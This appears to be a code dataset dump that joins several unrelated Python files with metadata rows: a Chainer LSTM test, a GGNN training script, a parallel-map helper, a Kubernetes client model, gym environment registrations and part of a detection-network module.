ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in self.ws]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in self.bs]
with chainer.using_config('train', train):
return functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
def test_call_cudnn_forward_training(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardTraining') as func:
self.forward(True)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_forward_inference(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardInference') as func:
self.forward(False)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_backward(self):
hy, cy, ys = self.forward(True)
hy.grad = self.dhy
with mock.patch('cupy.cuda.cudnn.RNNBackwardWeights') as func:
hy.backward()
self.assertEqual(func.called, self.expect)
testing.run_module(__name__, __file__)
| 36.78 | 79 | 0.531485 | import unittest
import mock
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def sigmoid(x):
return numpy.tanh(x * 0.5) * 0.5 + 0.5
def _split(inputs, pos):
return inputs[:pos], inputs[pos:]
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
class TestNStepLSTM(unittest.TestCase):
batches = [3, 2, 1]
length = len(batches)
in_size = 3
out_size = 2
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [numpy.random.uniform(-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.hx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(numpy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(numpy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [numpy.random.uniform(-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.dhy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
def check_forward(
self, h_data, c_data, xs_data, ws_data, bs_data, volatile):
h = chainer.Variable(h_data, volatile=volatile)
c = chainer.Variable(c_data, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in xs_data]
ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in ws_data]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in bs_data]
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
e_hy = self.hx.copy()
e_cy = self.cx.copy()
for ind in range(self.length):
x = self.xs[ind]
batch = x.shape[0]
for layer in range(self.n_layers):
w = self.ws[layer]
b = self.bs[layer]
h_prev = e_hy[layer, :batch]
c_prev = e_cy[layer, :batch]
i = sigmoid(x.dot(w[0].T) + h_prev.dot(w[4].T) + b[0] + b[4])
f = sigmoid(x.dot(w[1].T) + h_prev.dot(w[5].T) + b[1] + b[5])
c_bar = numpy.tanh(
x.dot(w[2].T) + h_prev.dot(w[6].T) + b[2] + b[6])
o = sigmoid(x.dot(w[3].T) + h_prev.dot(w[7].T) + b[3] + b[7])
e_c = (f * c_prev + i * c_bar)
e_h = o * numpy.tanh(e_c)
e_hy[layer, :batch] = e_h
e_cy[layer, :batch] = e_c
x = e_h
testing.assert_allclose(
ys[ind].data, x, rtol=1e-4, atol=1e-4)
testing.assert_allclose(hy.data, e_hy, rtol=1e-4, atol=1e-4)
testing.assert_allclose(cy.data, e_cy, rtol=1e-4, atol=1e-4)
def test_forward_cpu(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, False)
def test_forward_cpu_volatile(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, True)
@attr.gpu
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
False)
@attr.gpu
def test_forward_gpu_volatile(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
True)
def check_backward(self, h_data, c_data, xs_data, ws_data, bs_data,
dhy_data, dcy_data, dys_data):
args = tuple([h_data, c_data] + sum(ws_data, []) + sum(bs_data, []) +
xs_data)
grads = tuple([dhy_data, dcy_data] + dys_data)
def f(*inputs):
(hx, cx), inputs = _split(inputs, 2)
ws = []
for i in range(self.n_layers):
weights, inputs = _split(inputs, 8)
ws.append(weights)
bs = []
for i in range(self.n_layers):
biases, inputs = _split(inputs, 8)
bs.append(biases)
xs = inputs
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, hx, cx, ws, bs, xs)
return (hy, cy) + ys
gradient_check.check_backward(
f, args, grads, eps=1e-2, rtol=1e-3, atol=1e-3)
def test_backward_cpu(self):
self.check_backward(self.hx, self.cx, self.xs, self.ws, self.bs,
self.dhy, self.dcy, self.dys)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
cuda.to_gpu(self.dhy),
cuda.to_gpu(self.dcy),
[cuda.to_gpu(dy) for dy in self.dys])
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
@attr.cudnn
class TestNStepLSTMCudnnCall(unittest.TestCase):
batches = [4, 3, 2, 1]
length = len(batches)
in_size = 3
out_size = 4
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [cuda.cupy.random.uniform(
-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.hx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [cuda.cupy.random.uniform(
-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.dhy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.expect = self.use_cudnn and (
cuda.cudnn.cudnn.getVersion() >= 5000)
def forward(self, train):
volatile = not train
h = chainer.Variable(self.hx, volatile=volatile)
c = chainer.Variable(self.cx, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in self.xs]
ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in self.ws]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in self.bs]
with chainer.using_config('train', train):
return functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
def test_call_cudnn_forward_training(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardTraining') as func:
self.forward(True)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_forward_inference(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardInference') as func:
self.forward(False)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_backward(self):
hy, cy, ys = self.forward(True)
hy.grad = self.dhy
with mock.patch('cupy.cuda.cudnn.RNNBackwardWeights') as func:
hy.backward()
self.assertEqual(func.called, self.expect)
testing.run_module(__name__, __file__)
| true | true |
f7326a11d6895ddea9102d2cf1365d083cdc73a6 | 4,758 | py | Python | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | import argparse
import random
import torch
import torch.nn as nn
import torch.optim as optim
from model_live import GGNN
from utils.train_live import train
from utils.test_live import test
from utils.validation_live import validation
from utils.data.wy_dataset_live import bAbIDataset
from utils.data.dataloader import bAbIDataloader
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', type=int, default=4, help='bAbI task id')
parser.add_argument('--question_id', type=int, default=0, help='question types')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=2)
# parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--state_dim', type=int, default=4, help='GGNN hidden state size')
parser.add_argument('--n_steps', type=int, default=1, help='propogation steps number of GGNN')
# parser.add_argument('--niter', type=int, default=10, help='number of epochs to train for')
parser.add_argument('--niter', type=int, default=15, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.01, help='learning rate')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--verbal', action='store_true', help='print training info or not')
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--criterion', type=int, default=1)
parser.add_argument('--choice_steps', type=int, default=2)
parser.add_argument('--how_many', type=int, default=40)
opt = parser.parse_args()
# todo : shuffle before each epoch, specify the number od n_steps
if opt.manualSeed is None:
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/live_jfree/lala'
#opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/one'
if opt.cuda:
torch.cuda.manual_seed_all(opt.manualSeed)
def main(opt):
train_dataset = bAbIDataset(opt.dataroot, opt.question_id, "t",0,opt.how_many)
print("len(train_dataset)",len(train_dataset))
# for i, (adj_matrix, annotation, target) in enumerate(train_dataset, 0):
# print("annotation size",annotation.shape)
# print("adj_matrix size",adj_matrix.shape)
# print("target int",target)
# break
# for i, (adj_matrix, annotation, target) in enumerate(train_dataloader, 0):
# print("@annotation size",annotation.shape)
# print("@adj_matrix size",adj_matrix.shape)
# print("@target size",target.shape)
# break
validation_dataset = bAbIDataset(opt.dataroot, opt.question_id, "v", train_dataset.n_node,opt.how_many)
validation_dataloader = bAbIDataloader(validation_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(validation_dataset)",len(validation_dataset))
test_dataset = bAbIDataset(opt.dataroot, opt.question_id, "est", train_dataset.n_node,opt.how_many)
test_dataloader = bAbIDataloader(test_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(test_dataset)",len(test_dataset))
opt.annotation_dim = train_dataset.n_def # for bAbI
opt.n_edge_types = train_dataset.n_edge_types
opt.n_node = train_dataset.n_node
opt.state_dim = opt.annotation_dim
opt.n_steps = opt.n_node
if opt.choice_steps == 2:
opt.n_steps = round(opt.n_node*0.5)
elif opt.choice_steps == 3:
opt.n_steps = opt.n_node*2
elif opt.choice_steps == 4:
opt.n_steps = opt.n_node*opt.n_node
elif opt.choice_steps == 5:
opt.n_steps = round(opt.n_node*0.3)
net = GGNN(opt)
net.double()
criterion = nn.SmoothL1Loss()
if opt.criterion == 2:
criterion = torch.nn.L1Loss()
elif opt.criterion == 3:
criterion = torch.nn.MSELoss()
if opt.cuda:
net.cuda()
criterion.cuda()
optimizer = optim.Adam(net.parameters(), lr=opt.lr)
print("opt",opt)
print(net)
for epoch in range(0, opt.niter):
train_dataloader = bAbIDataloader(train_dataset, batch_size=opt.batchSize, \
shuffle=True, num_workers=4)
print("len(train_dataloader)",len(train_dataloader))
train(epoch, train_dataloader, net, criterion, optimizer, opt)
validation(validation_dataloader, net, criterion, optimizer, opt)
test(test_dataloader, net, criterion, optimizer, opt)
if __name__ == "__main__":
main(opt)
| 39.983193 | 107 | 0.696511 | import argparse
import random
import torch
import torch.nn as nn
import torch.optim as optim
from model_live import GGNN
from utils.train_live import train
from utils.test_live import test
from utils.validation_live import validation
from utils.data.wy_dataset_live import bAbIDataset
from utils.data.dataloader import bAbIDataloader
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', type=int, default=4, help='bAbI task id')
parser.add_argument('--question_id', type=int, default=0, help='question types')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=2)
parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--state_dim', type=int, default=4, help='GGNN hidden state size')
parser.add_argument('--n_steps', type=int, default=1, help='propogation steps number of GGNN')
parser.add_argument('--niter', type=int, default=15, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.01, help='learning rate')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--verbal', action='store_true', help='print training info or not')
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--criterion', type=int, default=1)
parser.add_argument('--choice_steps', type=int, default=2)
parser.add_argument('--how_many', type=int, default=40)
opt = parser.parse_args()
if opt.manualSeed is None:
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/live_jfree/lala'
if opt.cuda:
torch.cuda.manual_seed_all(opt.manualSeed)
def main(opt):
train_dataset = bAbIDataset(opt.dataroot, opt.question_id, "t",0,opt.how_many)
print("len(train_dataset)",len(train_dataset))
validation_dataset = bAbIDataset(opt.dataroot, opt.question_id, "v", train_dataset.n_node,opt.how_many)
validation_dataloader = bAbIDataloader(validation_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(validation_dataset)",len(validation_dataset))
test_dataset = bAbIDataset(opt.dataroot, opt.question_id, "est", train_dataset.n_node,opt.how_many)
test_dataloader = bAbIDataloader(test_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(test_dataset)",len(test_dataset))
opt.annotation_dim = train_dataset.n_def
opt.n_edge_types = train_dataset.n_edge_types
opt.n_node = train_dataset.n_node
opt.state_dim = opt.annotation_dim
opt.n_steps = opt.n_node
if opt.choice_steps == 2:
opt.n_steps = round(opt.n_node*0.5)
elif opt.choice_steps == 3:
opt.n_steps = opt.n_node*2
elif opt.choice_steps == 4:
opt.n_steps = opt.n_node*opt.n_node
elif opt.choice_steps == 5:
opt.n_steps = round(opt.n_node*0.3)
net = GGNN(opt)
net.double()
criterion = nn.SmoothL1Loss()
if opt.criterion == 2:
criterion = torch.nn.L1Loss()
elif opt.criterion == 3:
criterion = torch.nn.MSELoss()
if opt.cuda:
net.cuda()
criterion.cuda()
optimizer = optim.Adam(net.parameters(), lr=opt.lr)
print("opt",opt)
print(net)
for epoch in range(0, opt.niter):
train_dataloader = bAbIDataloader(train_dataset, batch_size=opt.batchSize, \
shuffle=True, num_workers=4)
print("len(train_dataloader)",len(train_dataloader))
train(epoch, train_dataloader, net, criterion, optimizer, opt)
validation(validation_dataloader, net, criterion, optimizer, opt)
test(test_dataloader, net, criterion, optimizer, opt)
if __name__ == "__main__":
main(opt)
| true | true |
f7326a1f506ca5fb7b3e97b0d077dc016e7eb7c7 | 2,147 | py | Python | ppstructure/table/table_metric/parallel.py | nan-wang/PaddleOCR | 31b06a2fd19f877a09acaf658387bd919c289b8e | [
"Apache-2.0"
] | 20,401 | 2020-05-08T10:56:13.000Z | 2022-03-31T23:34:38.000Z | ppstructure/table/table_metric/parallel.py | justld/PaddleOCR | 09604c38e42591c240771edbbff43a6dd7ebf592 | [
"Apache-2.0"
] | 4,988 | 2020-05-10T08:19:41.000Z | 2022-03-31T17:57:11.000Z | ppstructure/table/table_metric/parallel.py | justld/PaddleOCR | 09604c38e42591c240771edbbff43a6dd7ebf592 | [
"Apache-2.0"
] | 4,479 | 2020-05-08T11:12:13.000Z | 2022-03-31T11:55:28.000Z | from tqdm import tqdm
from concurrent.futures import ProcessPoolExecutor, as_completed
def parallel_process(array, function, n_jobs=16, use_kwargs=False, front_num=0):
"""
A parallel version of the map function with a progress bar.
Args:
array (array-like): An array to iterate over.
function (function): A python function to apply to the elements of array
n_jobs (int, default=16): The number of cores to use
use_kwargs (boolean, default=False): Whether to consider the elements of array as dictionaries of
keyword arguments to function
front_num (int, default=3): The number of iterations to run serially before kicking off the parallel job.
Useful for catching bugs
Returns:
[function(array[0]), function(array[1]), ...]
"""
# We run the first few iterations serially to catch bugs
if front_num > 0:
front = [function(**a) if use_kwargs else function(a)
for a in array[:front_num]]
else:
front = []
# If we set n_jobs to 1, just run a list comprehension. This is useful for benchmarking and debugging.
if n_jobs == 1:
return front + [function(**a) if use_kwargs else function(a) for a in tqdm(array[front_num:])]
# Assemble the workers
with ProcessPoolExecutor(max_workers=n_jobs) as pool:
# Pass the elements of array into function
if use_kwargs:
futures = [pool.submit(function, **a) for a in array[front_num:]]
else:
futures = [pool.submit(function, a) for a in array[front_num:]]
kwargs = {
'total': len(futures),
'unit': 'it',
'unit_scale': True,
'leave': True
}
# Print out the progress as tasks complete
for f in tqdm(as_completed(futures), **kwargs):
pass
out = []
# Get the results from the futures.
for i, future in tqdm(enumerate(futures)):
try:
out.append(future.result())
except Exception as e:
out.append(e)
return front + out
| 41.288462 | 117 | 0.610154 | from tqdm import tqdm
from concurrent.futures import ProcessPoolExecutor, as_completed
def parallel_process(array, function, n_jobs=16, use_kwargs=False, front_num=0):
if front_num > 0:
front = [function(**a) if use_kwargs else function(a)
for a in array[:front_num]]
else:
front = []
if n_jobs == 1:
return front + [function(**a) if use_kwargs else function(a) for a in tqdm(array[front_num:])]
with ProcessPoolExecutor(max_workers=n_jobs) as pool:
if use_kwargs:
futures = [pool.submit(function, **a) for a in array[front_num:]]
else:
futures = [pool.submit(function, a) for a in array[front_num:]]
kwargs = {
'total': len(futures),
'unit': 'it',
'unit_scale': True,
'leave': True
}
for f in tqdm(as_completed(futures), **kwargs):
pass
out = []
for i, future in tqdm(enumerate(futures)):
try:
out.append(future.result())
except Exception as e:
out.append(e)
return front + out
| true | true |
f7326b3311cb80454a1fb34edc479c00815ea490 | 6,749 | py | Python | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 7 | 2019-12-21T00:14:14.000Z | 2021-03-11T14:51:37.000Z | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 29 | 2019-10-09T11:16:21.000Z | 2020-06-23T09:32:09.000Z | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 1 | 2021-05-07T10:13:31.000Z | 2021-05-07T10:13:31.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1StorageClassList(object):
"""
NOTE: This class is auto generated by the swagger code generator program.
Do not edit the class manually.
"""
"""
Attributes:
swagger_types (dict): The key is attribute name
and the value is attribute type.
attribute_map (dict): The key is attribute name
and the value is json key in definition.
"""
swagger_types = {
'api_version': 'str',
'items': 'list[V1StorageClass]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
"""
V1StorageClassList - a model defined in Swagger
"""
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
"""
Gets the api_version of this V1StorageClassList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:return: The api_version of this V1StorageClassList.
:rtype: str
"""
return self._api_version
@api_version.setter
def api_version(self, api_version):
"""
Sets the api_version of this V1StorageClassList.
APIVersion defines the versioned schema of this representation of an object. Servers should convert recognized schemas to the latest internal value, and may reject unrecognized values. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#resources
:param api_version: The api_version of this V1StorageClassList.
:type: str
"""
self._api_version = api_version
@property
def items(self):
"""
Gets the items of this V1StorageClassList.
Items is the list of StorageClasses
:return: The items of this V1StorageClassList.
:rtype: list[V1StorageClass]
"""
return self._items
@items.setter
def items(self, items):
"""
Sets the items of this V1StorageClassList.
Items is the list of StorageClasses
:param items: The items of this V1StorageClassList.
:type: list[V1StorageClass]
"""
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
"""
Gets the kind of this V1StorageClassList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:return: The kind of this V1StorageClassList.
:rtype: str
"""
return self._kind
@kind.setter
def kind(self, kind):
"""
Sets the kind of this V1StorageClassList.
Kind is a string value representing the REST resource this object represents. Servers may infer this from the endpoint the client submits requests to. Cannot be updated. In CamelCase. More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#types-kinds
:param kind: The kind of this V1StorageClassList.
:type: str
"""
self._kind = kind
@property
def metadata(self):
"""
Gets the metadata of this V1StorageClassList.
Standard list metadata More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:return: The metadata of this V1StorageClassList.
:rtype: V1ListMeta
"""
return self._metadata
@metadata.setter
def metadata(self, metadata):
"""
Sets the metadata of this V1StorageClassList.
Standard list metadata More info: https://git.k8s.io/community/contributors/devel/api-conventions.md#metadata
:param metadata: The metadata of this V1StorageClassList.
:type: V1ListMeta
"""
self._metadata = metadata
def to_dict(self):
"""
Returns the model properties as a dict
"""
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
"""
Returns the string representation of the model
"""
return pformat(self.to_dict())
def __repr__(self):
"""
For `print` and `pprint`
"""
return self.to_str()
def __eq__(self, other):
"""
Returns true if both objects are equal
"""
if not isinstance(other, V1StorageClassList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""
Returns true if both objects are not equal
"""
return not self == other
| 31.834906 | 282 | 0.588532 |
from pprint import pformat
from six import iteritems
import re
class V1StorageClassList(object):
swagger_types = {
'api_version': 'str',
'items': 'list[V1StorageClass]',
'kind': 'str',
'metadata': 'V1ListMeta'
}
attribute_map = {
'api_version': 'apiVersion',
'items': 'items',
'kind': 'kind',
'metadata': 'metadata'
}
def __init__(self, api_version=None, items=None, kind=None, metadata=None):
self._api_version = None
self._items = None
self._kind = None
self._metadata = None
self.discriminator = None
if api_version is not None:
self.api_version = api_version
self.items = items
if kind is not None:
self.kind = kind
if metadata is not None:
self.metadata = metadata
@property
def api_version(self):
return self._api_version
@api_version.setter
def api_version(self, api_version):
self._api_version = api_version
@property
def items(self):
return self._items
@items.setter
def items(self, items):
if items is None:
raise ValueError("Invalid value for `items`, must not be `None`")
self._items = items
@property
def kind(self):
return self._kind
@kind.setter
def kind(self, kind):
self._kind = kind
@property
def metadata(self):
return self._metadata
@metadata.setter
def metadata(self, metadata):
self._metadata = metadata
def to_dict(self):
result = {}
for attr, _ in iteritems(self.swagger_types):
value = getattr(self, attr)
if isinstance(value, list):
result[attr] = list(map(
lambda x: x.to_dict() if hasattr(x, "to_dict") else x,
value
))
elif hasattr(value, "to_dict"):
result[attr] = value.to_dict()
elif isinstance(value, dict):
result[attr] = dict(map(
lambda item: (item[0], item[1].to_dict())
if hasattr(item[1], "to_dict") else item,
value.items()
))
else:
result[attr] = value
return result
def to_str(self):
return pformat(self.to_dict())
def __repr__(self):
return self.to_str()
def __eq__(self, other):
if not isinstance(other, V1StorageClassList):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
return not self == other
| true | true |
f7326c132616d2be4a3970c75e1ba25cc38dc29b | 980 | py | Python | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | baselines/ppo1/test_env/__init__.py | ByzanTine/baselines | 69432726b689c555cdf118ad0dcf9665abbc4b9d | [
"MIT"
] | null | null | null | from gym.envs.registration import register
import gym
from test_env.envs import *
register(
id='Fourrooms-v1',
entry_point='test_env.envs.fourrooms:Fourrooms',
kwargs={
'map_name': '9x9',
})
register(
id='Fourroomssto-v1',
entry_point='test_env.envs.fourroom_sto:Fourroomssto',
)
register(
id='KeyDoor-v1',
entry_point='test_env.envs.key_door:KeyDoor',
)
register(
id='DoubleCartPole-v1',
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='QuadCartPole-v1',
kwargs={
'num_tasks': 4,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='16CartPole-v1',
kwargs={
'num_tasks': 16,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
| 20 | 69 | 0.687755 | from gym.envs.registration import register
import gym
from test_env.envs import *
register(
id='Fourrooms-v1',
entry_point='test_env.envs.fourrooms:Fourrooms',
kwargs={
'map_name': '9x9',
})
register(
id='Fourroomssto-v1',
entry_point='test_env.envs.fourroom_sto:Fourroomssto',
)
register(
id='KeyDoor-v1',
entry_point='test_env.envs.key_door:KeyDoor',
)
register(
id='DoubleCartPole-v1',
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='QuadCartPole-v1',
kwargs={
'num_tasks': 4,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
register(
id='16CartPole-v1',
kwargs={
'num_tasks': 16,
},
entry_point='test_env.envs.double_cart_pole:MultipleCartPoleEnv',
max_episode_steps=200,
reward_threshold=195.0,
)
| true | true |
f7326c428c5b6a9d336ebdb571cfc85e2104fd66 | 14,664 | py | Python | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | 17 | 2019-05-14T10:47:25.000Z | 2021-06-09T05:39:47.000Z | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | null | null | null | horch/legacy/models/detection/enhance.py | sbl1996/pytorch-hrvvi-ext | f19abcbedd844a700b2e2596dd817ea80cbb6287 | [
"MIT"
] | 5 | 2019-08-08T07:04:38.000Z | 2020-07-04T08:58:32.000Z | import torch
import torch.nn as nn
import torch.nn.functional as F
from horch.common import tuplify
from horch.models.block import mb_conv_block, MBConv
from horch.models.detection.nasfpn import ReLUConvBN
from horch.models.modules import upsample_add, Conv2d, Sequential, Pool2d, upsample_concat
from horch.models.detection.nasfpn import NASFPN
from horch.models.utils import remove_stride_padding
class TopDown(nn.Module):
def __init__(self, in_channels, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels, f_channels, kernel_size=1,
norm='default')
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = upsample_concat(p, self.lat(c))
else:
p = upsample_add(p, self.lat(c))
p = self.conv(p)
return p
class DeconvTopDown(nn.Module):
def __init__(self, in_channels1, in_channels2, f_channels, lite=False, aggregate='add'):
super().__init__()
self.aggregate = aggregate
self.lat = Conv2d(
in_channels1, f_channels, kernel_size=1,
norm='default')
self.deconv = Conv2d(in_channels2, f_channels, kernel_size=4, stride=2,
norm='default', depthwise_separable=lite, transposed=True)
channels = f_channels * 2 if aggregate == 'cat' else f_channels
self.conv = Conv2d(
channels, f_channels, kernel_size=5 if lite else 3,
norm='default', act='default', depthwise_separable=lite)
def forward(self, c, p):
if self.aggregate == 'cat':
p = torch.cat([self.lat(c), self.deconv(p)], dim=1)
else:
p = self.lat(c) + self.deconv(p)
p = self.conv(p)
return p
class FPNExtraLayers(nn.Module):
